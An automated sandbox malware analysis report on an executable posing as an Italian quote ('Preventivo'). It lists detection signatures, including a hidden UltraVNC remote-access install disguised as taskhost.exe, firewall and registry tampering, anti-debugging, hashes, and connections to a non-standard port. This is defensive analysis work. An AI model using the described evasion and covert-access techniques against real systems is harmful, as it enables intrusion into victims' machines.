Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name: Preventivo24.01.11.exe
Analysis ID: 1379424
MD5: 32f35b78a3dc5949ce3c99f2981def6b
SHA1: 18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256: 0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags: exe
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionalty to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Preventivo24.01.11.exe Virustotal: Detection: 17% Perma Link
Uses 32bit PE files
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a: Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose, 0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE3210 FindFirstFileW,FindClose, 0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3C10 FindFirstFileW,FindClose, 0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose, 0_2_00FCBFF0
Source: C:\Games\taskhost.exe Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 41_2_000BEC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00FF2400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\ Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49749 -> 140.228.29.110:5500
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.202.204.11 52.202.204.11
Source: Joe Sandbox View IP Address: 93.184.216.34 93.184.216.34
Source: Joe Sandbox View IP Address: 93.184.216.34 93.184.216.34
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic HTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: www.example.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 590017Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:17:59 GMTExpires: Tue, 30 Jan 2024 11:17:59 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
Source: shi6E82.tmp.0.dr String found in binary or memory: http://.css
Source: shi6E82.tmp.0.dr String found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
